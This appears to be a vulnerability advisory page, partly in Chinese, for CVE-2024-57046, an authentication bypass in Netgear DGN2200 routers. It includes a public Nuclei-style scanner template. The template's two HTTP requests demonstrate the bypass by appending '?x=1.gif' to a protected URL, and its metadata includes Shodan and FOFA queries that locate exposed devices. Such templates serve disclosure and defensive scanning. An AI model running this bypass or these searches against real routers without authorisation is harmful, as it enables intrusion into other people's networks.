CVE-2024-57046: Netgear DGN2200 - Improper Authentication

日期: 2025-08-01 | 影响软件: Netgear DGN2200 | POC: 已公开

漏洞描述

A vulnerability in the Netgear DGN2200 router with firmware version v1.0.0.46 and earlier permits unauthorized individuals to bypass the authentication. When adding "?x=1.gif" to the requested url, it will be recognized as passing the authentication.

PoC代码[已公开]

id: CVE-2024-57046

info:
  name: Netgear DGN2200 - Improper Authentication
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in the Netgear DGN2200 router with firmware version v1.0.0.46 and earlier permits unauthorized individuals to bypass the authentication. When adding "?x=1.gif" to the requested url, it will be recognized as passing the authentication.
  reference:
    - https://github.com/Shuanunio/CVE_Requests/blob/main/Netgear/DGN2200/ACL%20bypass%20Vulnerability%20in%20Netgear%20DGN2200.md
    - https://www.netgear.com/about/security/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57046
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-57046
    cwe-id: CWE-287
    epss-score: 0.52249
    epss-percentile: 0.97847
  metadata:
    verified: true
    max-request: 2
    vendor: Netgear
    product: DGN2200
    shodan-query: http.title:"DGN2200"
    fofa-query: title="NETGEAR DGN2200"
  tags: cve,cve2024,netgear,router,auth-bypass,dgn2200

http:
  - raw:
      - |
        GET /RST_status.htm HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /RST_status.htm?x=1.gif HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_2, "<title>Router Status", "Show Statistics")'
          - 'status_code_1 == 401 && status_code_2 == 200'
        condition: and
# digest: 4b0a00483046022100f31b97886b79479a07346e9f23bc04fdeecdff4b3bdb8eacdbcf976b7e0bd279022100cae9a26a6d58c67fd27f12f97ce93e3a8c8cf910954de80c9c8789b4697fca13:922c64590222798bb761d5b6d8e72950

相关漏洞推荐